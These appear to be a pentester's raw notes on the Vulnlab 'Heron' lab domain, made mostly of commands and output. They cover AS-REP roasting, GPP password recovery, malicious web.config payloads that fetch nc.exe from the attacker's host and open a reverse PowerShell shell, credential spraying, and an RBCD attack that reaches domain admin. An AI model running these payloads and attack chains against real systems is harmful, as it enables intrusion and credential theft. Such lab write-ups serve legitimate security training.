Here is my notes on HERON box from Vulnlab.
HERON:
mucdc.heron.vl:10.10.255.101
Nmap scan report for 10.10.255.101
Host is up (0.00042s latency).
Not shown: 1145 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
CEO:
wayne.wood@heron.vl
Head of IT:
julian.pratt@heron.vl
Accounting:
samuel.davies@heron.vl
accounting.heron.vl site - #From SMB as svc-web-accounting-d.
88/tcp open kerberos
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# sudo GetNPUsers.py -no-pass -dc-ip 10.10.255.101 -usersfile users.txt heron.vl/
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'GetNPUsers.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[-] User svc-web-accounting-d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-web-accounting doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User julian.pratt doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$samuel.davies@HERON.VL:25bef58d185fab4832a5b64d1afe7217$cdc84e9a5996280901cdef12200ad31c9c5917a3b5a9585f04ea025e1677aa326b9698c50d5c4cf84a3a4f121e926e8229bc91d411d72021eb24ac88a93ad462659c6188bbb1ae2358f4e90d92e49b2f55fd3c314dabf3b26ac25f9dadc17aa2fa74c947683d3b447fc3e35c197b0bbab72d5deba2784aa809bfeceb793a2af54fc24a9dbe19ffb7b99e87a7b929f9a303da3d94169f2d641ddef4f151f67fc2d455efe015158c6b863f3caaee6ad4e94860b96d5ba24e333e3595f18596025b663b30bef408dc32c2b492b8033244ba8289b1e3fd592533e9760a26692ac2dd2e5934fb
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat users.txt
svc-web-accounting-d
svc-web-accounting
wayne.wood
julian.pratt
samuel.davies
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
l6fkiy9oN ($krb5asrep$23$samuel.davies@HERON.VL)
1g 0:00:00:05 DONE (2024-10-26 13:02) 0.1718g/s 22520p/s 22520c/s 22520C/s mari10..kovacs
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
CRED DISCOVER !
samuel.davies:l6fkiy9oN
sudo impacket-GetUserSPNs -request -dc-ip 10.10.255.101 heron.vl/samuel.davies
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# sudo impacket-GetUserSPNs -request -dc-ip 10.10.255.101 heron.vl/samuel.davies
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------- ------------------ -------------------------------- -------------------------- -------------------------- ----------
accounting/mucdc.heron.vl svc-web-accounting CN=audit,CN=Users,DC=heron,DC=vl 2024-06-01 11:07:44.428061 2024-06-07 06:34:23.314374
[-] type object 'CCache' has no attribute 'parseFile'
#NOPE, no hash.
135/tcp open epmap
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
crackmapexec smb 10.10.255.101 -u samuel.davies -p l6fkiy9oN --shares
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# crackmapexec smb 10.10.255.101 -u 'samuel.davies' -p 'l6fkiy9oN' --shares
SMB 10.10.255.101 445 MUCDC [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB 10.10.255.101 445 MUCDC [+] heron.vl\samuel.davies:l6fkiy9oN
SMB 10.10.255.101 445 MUCDC [+] Enumerated shares
SMB 10.10.255.101 445 MUCDC Share Permissions Remark
SMB 10.10.255.101 445 MUCDC ----- ----------- ------
SMB 10.10.255.101 445 MUCDC accounting$
SMB 10.10.255.101 445 MUCDC ADMIN$ Remote Admin
SMB 10.10.255.101 445 MUCDC C$ Default share
SMB 10.10.255.101 445 MUCDC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.255.101 445 MUCDC home$ READ
SMB 10.10.255.101 445 MUCDC IPC$ Remote IPC
SMB 10.10.255.101 445 MUCDC it$
SMB 10.10.255.101 445 MUCDC NETLOGON READ Logon server share
SMB 10.10.255.101 445 MUCDC SYSVOL READ Logon server share #Interesting.
SMB 10.10.255.101 445 MUCDC transfer$ READ,WRITE #NOPE
#FROM ASREPROASTING ATTACK.
smbclient \\\\10.10.255.101\\SYSVOL -U "samuel.davies%l6fkiy9oN"
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun May 26 05:37:40 2024
.. D 0 Sun May 26 05:37:40 2024
heron.vl Dr 0 Sun May 26 05:37:40 2024
6261499 blocks of size 4096. 1960798 blocks available
smb: \> cd heron.vl
smb: \heron.vl\> dir
. D 0 Sun May 26 05:38:59 2024
.. D 0 Sun May 26 05:37:40 2024
DfsrPrivate DHSr 0 Sun May 26 05:38:59 2024
Policies D 0 Tue Jun 4 11:57:41 2024
scripts D 0 Sun Jun 2 06:42:56 2024
6261499 blocks of size 4096. 1960798 blocks available
smb: \heron.vl\> cd scripts
smb: \heron.vl\scripts\> dir
. D 0 Sun Jun 2 06:42:56 2024
.. D 0 Sun May 26 05:38:59 2024
bginfo.bgi A 2009 Sun Jun 2 06:42:45 2024
Bginfo64.exe A 2774440 Sun Jun 2 06:41:18 2024
logon.vbs A 351 Sun Jun 2 06:43:52 2024 #Interesting.
mask ""
recurse
prompt
mget *
tree -r .
.
├── scripts
│ ├── bginfo.bgi
│ └── Bginfo64.exe
├── Policies
│ ├── {866ECED1-24B0-46EF-92F5-652345A1820C}
│ │ ├── User
│ │ ├── Machine
│ │ │ ├── Scripts
│ │ │ │ ├── Startup
│ │ │ │ └── Shutdown
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ └── Microsoft
│ │ │ └── Windows NT
│ │ │ └── SecEdit
│ │ │ └── GptTmpl.inf
│ │ └── GPT.INI
│ ├── {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}
│ │ ├── User
│ │ ├── Machine
│ │ │ └── Preferences
│ │ │ └── Groups
│ │ │ └── Groups.xml #Interesting !
│ │ └── GPT.INI
│ ├── {6AC1786C-016F-11D2-945F-00C04fB984F9}
┌──(root㉿kali)-[/home/…/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences]
└─# cd Groups
┌──(root㉿kali)-[/home/…/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups]
└─# ls
Groups.xml
┌──(root㉿kali)-[/home/…/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups]
└─# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2024-06-04 15:59:45" uid="{535B586D-9541-4420-8E32-224F589E4F3A}"><Properties action="U" newName="" description="" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="HERON\svc-web-accounting" action="ADD" sid="S-1-5-21-1568358163-2901064146-3316491674-24602"/><Member name="HERON\svc-web-accounting-d" action="ADD" sid="S-1-5-21-1568358163-2901064146-3316491674-26101"/></Members></Properties></Group>
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2024-06-04 16:00:13" uid="{F3B0115E-D062-46CC-B10C-C3EB743C824A}"><Properties action="U" newName="_local" fullName="" description="local administrator" cpassword="1G19pP9gbIPUr5xLeKhEUg==" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
</Groups>
crackmapexec smb 10.10.255.101 -u 'samuel.davies' -p 'l6fkiy9oN' -M gpp_password
https://github.com/t0thkr1s/gpp-decrypt
https://dan-feliciano.com/2024/06/28/heron/
crackmapexec smb 10.10.255.101 -u 'samuel.davies' -p 'l6fkiy9oN' -M gpp_password
SMB 10.10.255.101 445 MUCDC [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB 10.10.255.101 445 MUCDC [+] heron.vl\samuel.davies:l6fkiy9oN
GPP_PASS... 10.10.255.101 445 MUCDC [+] Found SYSVOL share
GPP_PASS... 10.10.255.101 445 MUCDC [*] Searching for potential XML files containing passwords
GPP_PASS... 10.10.255.101 445 MUCDC [*] Found heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.255.101 445 MUCDC [+] Found credentials in heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.255.101 445 MUCDC Password: H3r0n2024#!
GPP_PASS... 10.10.255.101 445 MUCDC action: U
GPP_PASS... 10.10.255.101 445 MUCDC newName: _local
GPP_PASS... 10.10.255.101 445 MUCDC fullName:
GPP_PASS... 10.10.255.101 445 MUCDC description: local administrator
GPP_PASS... 10.10.255.101 445 MUCDC changeLogon: 0
GPP_PASS... 10.10.255.101 445 MUCDC noChange: 0
GPP_PASS... 10.10.255.101 445 MUCDC neverExpires: 1
GPP_PASS... 10.10.255.101 445 MUCDC acctDisabled: 0
GPP_PASS... 10.10.255.101 445 MUCDC subAuthority: RID_ADMIN
GPP_PASS... 10.10.255.101 445 MUCDC userName: Administrator (built-in)
H3r0n2024#!
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat users.txt
svc-web-accounting-d
svc-web-accounting
wayne.wood
julian.pratt
samuel.davies
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# crackmapexec smb 10.10.255.101 -u users.txt -p 'H3r0n2024#!' --shares
SMB 10.10.255.101 445 MUCDC [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB 10.10.255.101 445 MUCDC [+] heron.vl\svc-web-accounting-d:H3r0n2024#!
SMB 10.10.255.101 445 MUCDC [+] Enumerated shares
SMB 10.10.255.101 445 MUCDC Share Permissions Remark
SMB 10.10.255.101 445 MUCDC ----- ----------- ------
SMB 10.10.255.101 445 MUCDC accounting$ READ,WRITE
SMB 10.10.255.101 445 MUCDC ADMIN$ Remote Admin
SMB 10.10.255.101 445 MUCDC C$ Default share
SMB 10.10.255.101 445 MUCDC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.255.101 445 MUCDC home$ READ
SMB 10.10.255.101 445 MUCDC IPC$ Remote IPC
SMB 10.10.255.101 445 MUCDC it$
SMB 10.10.255.101 445 MUCDC NETLOGON READ Logon server share
SMB 10.10.255.101 445 MUCDC SYSVOL READ Logon server share
SMB 10.10.255.101 445 MUCDC transfer$ READ,WRITE
svc-web-accounting-d:H3r0n2024#!
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# smbclient \\\\10.10.255.101\\accounting$ -U 'svc-web-accounting-d%H3r0n2024#!'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Oct 26 14:39:52 2024
.. DHS 0 Sun Jun 2 11:26:14 2024
AccountingApp.deps.json A 37407 Sun Jun 2 15:25:26 2024
AccountingApp.dll A 89600 Sun Jun 2 15:25:26 2024
AccountingApp.exe A 140800 Sun Jun 2 15:25:26 2024
AccountingApp.pdb A 39488 Sun Jun 2 15:25:26 2024
AccountingApp.runtimeconfig.json A 557 Sat Jun 1 18:22:20 2024
appsettings.Development.json A 127 Sat Jun 1 18:00:54 2024
appsettings.json A 237 Sat Jun 1 18:03:50 2024
FinanceApp.db A 106496 Sat Jun 1 10:09:00 2024
Microsoft.AspNetCore.Authentication.Negotiate.dll A 53920 Wed Nov 1 05:08:26 2023
Microsoft.AspNetCore.Cryptography.Internal.dll A 52912 Mon May 20 08:23:52 2024
Microsoft.AspNetCore.Cryptography.KeyDerivation.dll A 23712 Mon May 20 08:23:56 2024
Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll A 108808 Mon May 20 08:24:24 2024
Microsoft.Data.Sqlite.dll A 172992 Mon May 20 03:54:40 2024
Microsoft.EntityFrameworkCore.Abstractions.dll A 34848 Mon May 20 03:54:30 2024
Microsoft.EntityFrameworkCore.dll A 2533312 Mon May 20 03:55:04 2024
Microsoft.EntityFrameworkCore.Relational.dll A 1991616 Mon May 20 03:55:20 2024
Microsoft.EntityFrameworkCore.Sqlite.dll A 257456 Mon May 20 03:55:30 2024
Microsoft.Extensions.DependencyModel.dll A 79624 Tue Oct 31 18:59:24 2023
Microsoft.Extensions.Identity.Core.dll A 177840 Mon May 20 08:24:10 2024
Microsoft.Extensions.Identity.Stores.dll A 45232 Mon May 20 08:24:20 2024
Microsoft.Extensions.Options.dll A 64776 Thu Jan 18 06:05:26 2024
runtimes D 0 Sat Jun 1 10:51:32 2024
SQLitePCLRaw.batteries_v2.dll A 5120 Wed Aug 23 22:41:24 2023
SQLitePCLRaw.core.dll A 50688 Wed Aug 23 22:38:38 2023
SQLitePCLRaw.provider.e_sqlite3.dll A 35840 Wed Aug 23 22:38:52 2023
System.DirectoryServices.Protocols.dll A 71944 Tue Oct 31 19:00:24 2023
web.config A 554 Thu Jun 6 10:41:39 2024 #Interesting
wwwroot D 0 Sat Jun 1 10:51:32 2024
smb: \> get web.config
getting file \web.config of size 554 as web.config (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat web.config
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="dotnet" arguments=".\AccountingApp.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
Share name is accounting so the vhost is accounting.heron.vl website which is required a credential.
Since we can modify web.config, we can gain a RCE out of it.
web.config RCE: (Malicious payload in web.config file)
-Only works if you can modify web.config file thorugh smb, FTP or any other vulnerabilties exploited.
Uploading web.config for Fun and Profit 2
https://ethicxz.github.io/VL-Heron-Chain/#getting-a-shell-on-the-windows-machine
https://medium.com/@jeroenverhaeghe/rce-from-web-config-461a5eab8ce9
AspNetCoreModuleV2 of web.config file:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<system.webServer>
<remove name="aspNetCore" />
<add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd" arguments="/C ping 127.0.0.1 > c:/output.txt" hostingModel="OutOfProcess"/>
</system.webServer>
</configuration>
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments='/c echo IWR http://10.10.173.54:8000/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments='/c %TEMP%\nc.exe 10.10.173.54 9001 -e powershell' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments='/c echo IWR http://10.10.165.182:8000/ncat.exe -OutFile %TEMP%\nc.exe | powershell -noprofile' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments='/c %TEMP%\nc.exe 10.10.165.182 9001 -e powershell' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments='/c echo IWR http://10.10.165.182:8000/ncat.exe -OutFile %TEMP%\ncat.exe | powershell -noprofile' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments='/c %TEMP%\ncat.exe 10.10.165.182 9001 -e powershell' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
Access accounting.heron.vl/toto will execute web.config payload.
#This only works with frajmp.heron.vl since it can't ping to Kali.
Example:
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat web.config
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments='/c echo IWR http://10.10.165.182:8000/ncat.exe -OutFile %TEMP%\nc.exe | powershell -noprofile' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat web.config
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="toto" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments='/c %TEMP%\nc.exe 10.10.165.182 9001 -e powershell' stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
-Replace web.config each other to gain a user-shell of MUCDC.
pentest@frajmp:/tmp$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.165.181 51807
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\webaccounting> whoami
whoami
heron\svc-web-accounting
PS C:\webaccounting> hostname
hostname
mucdc
USER-SHELL as svc-web-accounting of MUCDC !
PS C:\> whoami
whoami
heron\svc-web-accounting
PS C:\> hostname
hostname
mucdc
PS C:\> dir
dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/1/2024 8:10 AM home
d----- 5/26/2024 2:31 AM inetpub
d----- 6/6/2024 7:22 AM it
d----- 10/28/2024 7:36 AM Microsoft
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 6/6/2024 7:22 AM Program Files
d----- 6/1/2024 7:30 AM Program Files (x86)
d----- 10/28/2024 6:29 AM transfer
d-r--- 6/1/2024 8:43 AM Users
d----- 10/28/2024 7:37 AM webaccounting
d----- 6/2/2024 8:26 AM Windows
-a---- 6/2/2024 3:45 AM 36 flag.txt
PS C:\> type flag.txt
type flag.txt
VL{REDIRECTED}
USER FLAG: VL{REDIRECTED}
PRIV ESC:
svc-web-accounting from mucdc -> root of frajmp:
Check if there are Credentials in C:\Windows\Scripts folder.
PS C:\Windows\Scripts> dir
dir
Directory: C:\Windows\Scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/6/2024 7:12 AM 1416 dns.ps1
-a---- 6/1/2024 8:26 AM 221 ssh.ps1 - Very Interested file.
PS C:\Windows\Scripts> type ssh.ps1
type ssh.ps1
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "Deplete5DenialDealt"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"
Found _local credential for frajmp !
_local:Deplete5DenialDealt
ROOT from frajmp -> julian.pratt:
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat users.txt
svc-web-accounting-d
svc-web-accounting
wayne.wood
julian.pratt
samuel.davies
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat pass.txt
l6fkiy9oN
H3r0n2024#!
Deplete5DenialDealt
crackmapexec smb 10.10.165.181 -u users.txt -p pass.txt --continue-on-success | grep [+]
SMB 10.10.165.181 445 MUCDC [+] heron.vl\svc-web-accounting-d:H3r0n2024#!
SMB 10.10.165.181 445 MUCDC [+] heron.vl\julian.pratt:Deplete5DenialDealt #FOUND IT !
SMB 10.10.165.181 445 MUCDC [+] heron.vl\samuel.davies:l6fkiy9oN
Perform Credential Spraying technique as a last resort. #HERON from VL.
julian.pratt:Deplete5DenialDealt
julian.pratt -> adm_prju:
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# crackmapexec smb 10.10.165.181 -u julian.pratt -p 'Deplete5DenialDealt' --shares
SMB 10.10.165.181 445 MUCDC [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB 10.10.165.181 445 MUCDC [+] heron.vl\julian.pratt:Deplete5DenialDealt
SMB 10.10.165.181 445 MUCDC [+] Enumerated shares
SMB 10.10.165.181 445 MUCDC Share Permissions Remark
SMB 10.10.165.181 445 MUCDC ----- ----------- ------
SMB 10.10.165.181 445 MUCDC accounting$
SMB 10.10.165.181 445 MUCDC ADMIN$ Remote Admin
SMB 10.10.165.181 445 MUCDC C$ Default share
SMB 10.10.165.181 445 MUCDC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.165.181 445 MUCDC home$ READ #Looks like julian can read her own directory in home$ share.
SMB 10.10.165.181 445 MUCDC IPC$ Remote IPC
SMB 10.10.165.181 445 MUCDC it$
SMB 10.10.165.181 445 MUCDC NETLOGON READ Logon server share
SMB 10.10.165.181 445 MUCDC SYSVOL READ Logon server share
SMB 10.10.165.181 445 MUCDC transfer$ READ,WRITE
smbclient \\\\10.10.165.181\\home$ -U "julian.pratt%Deplete5DenialDealt"
[SNIP]
Julian.Pratt D 0 Sun Jun 2 06:47:14 2024
[SNIP]
6261499 blocks of size 4096. 1961809 blocks available
smb: \> cd Julian.Pratt
smb: \Julian.Pratt\> dir
. D 0 Sun Jun 2 06:47:14 2024
.. D 0 Sat Jun 1 11:10:46 2024
frajmp.lnk A 1443 Sun Jun 2 06:47:47 2024
Is there a way to -auto login- in PuTTY with a password- - Super User.url A 117 Sat Jun 1 11:44:44 2024
Microsoft Edge.lnk A 2312 Sat Jun 1 11:44:38 2024
mucjmp.lnk A 1441 Sun Jun 2 06:47:33 2024 #Interested file.
mucjmp.lnk:
┌──(root㉿kali)-[/home/…/HERON/results/10.10.175.150/loot]
└─# cat mucjmp.lnk
[SNIP]
adm_prju@mucjmp -pw ayDMWV929N9wAiB4
[SNIP]
crackmapexec smb 10.10.165.181 -u adm_prju -p 'ayDMWV929N9wAiB4'
SMB 10.10.165.181 445 MUCDC [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB 10.10.165.181 445 MUCDC [+] heron.vl\adm_prju:ayDMWV929N9wAiB4
bloodhound-python -c All -u adm_prju -p 'ayDMWV929N9wAiB4' -d heron.vl --dns-tcp -ns 10.10.165.181
BloodHound DATA:
RBCD Attack:
ADM_PRJU@heron.vl -> member of ADMINS_T1@heron.vl group -> WriteAccountRestrictions -> MUCDC.HERON.VL: #Linux
First Option:
https://medium.com/@offsecdeer/a-practical-guide-to-rbcd-exploitation-a3f1a47267d5
impacket-addcomputer -computer-name 'rbcd-test$' -computer-pass 'Megaman!1' -dc-ip 10.10.165.181 heron.vl/adm_prju:'ayDMWV929N9wAiB4'
impacket-rbcd -delegate-to 'mucdc$' -delegate-from 'rbcd-test$' -dc-ip 10.10.65.181 -action write heron.vl/adm_prju:'ayDMWV929N9wAiB4
impacket-getST -spn cifs/mucdc.heron.vl -impersonate Administrator -dc-ip 10.10.65.181 heron.vl/rbcd-test:'Megaman!1'
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass heron.vl/administrator@mucdc.heron.vl
#Didn't work for HERON.VL because cannot add computer.
However it works for USER itself though ! which in this case is adm_prju user.
Second Option:
https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users
getTGT.py -hashes :$(pypykatz crypto nt 'ayDMWV929N9wAiB4') 'heron.vl'/'adm_prju'
describeTicket.py 'adm_prju.ccache' | grep 'Ticket Session Key'
smbpasswd.py -newhashes :4d2380ee7f799e8c84f91a9bcd7156a7 'heron.vl'/'adm_prju':'ayDMWV929N9wAiB4'@'heron.vl'
export KRB5CCNAME='adm_prju.ccache'
impacket-getST -u2u -impersonate "_admin" -spn "cifs/mucdc.heron.vl" -k -no-pass 'heron.vl'/'adm_prju'
export KRB5CCNAME='_admin@cifs_mucdc.heron.vl@HERON.VL.ccache'
crackmapexec smb 10.10.165.181 --use-kcache --ntds
#This does not work with old version of Impacket.
Third option: #WORKS FOR HERON.VL !
from frajmp -> mucdc:
https://ethicxz.github.io/VL-Heron-Chain/#other-way-to-privesc-rbcd-with-a-machine
https://github.com/sosdave/KeyTabExtract
keytabextract.py #Only works if you have a root of Linux machine that is a part of AD domain. #Useful for AD Attacks such as RBCD between linux and DC (HERON.VL).
python3 keytabextract.py /etc/krb5.keytab
root@frajmp:/tmp# python3 keytabextract.py /etc/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HERON.VL
SERVICE PRINCIPAL : FRAJMP$/
NTLM HASH : 6f55b3b443ef192c804b2ae98e8254f7
AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd
rbcd.py -delegate-from 'frajmp$' -delegate-to 'mucdc$' -dc-ip 10.10.175.5 -action 'write' 'heron.vl/adm_prju:ayDMWV929N9wAiB4'
rbcd.py -delegate-to 'mucdc$' -dc-ip 10.10.175.5 -action 'read' 'heron.vl/adm_prju:ayDMWV929N9wAiB4'
impacket-getST -dc-ip 10.10.175.5 -spn cifs/mucdc.heron.vl 'heron.vl/frajmp$' -impersonate _admin -hashes :6f55b3b443ef192c804b2ae98e8254f7
export KRB5CCNAME=_admin.ccache
crackmapexec smb 10.10.175.5 --use-kcache --ntds
impacket-psexec -k -no-pass heron.vl/_admin@mucdc.heron.vl
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on mucdc.heron.vl.....
[*] Found writable share accounting$
[*] Uploading file pIsSfeMR.exe
[*] Opening SVCManager on mucdc.heron.vl.....
[*] Creating service XxdS on mucdc.heron.vl.....
[*] Starting service XxdS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2461]
(c) Microsoft Corporation. All rights reserved.
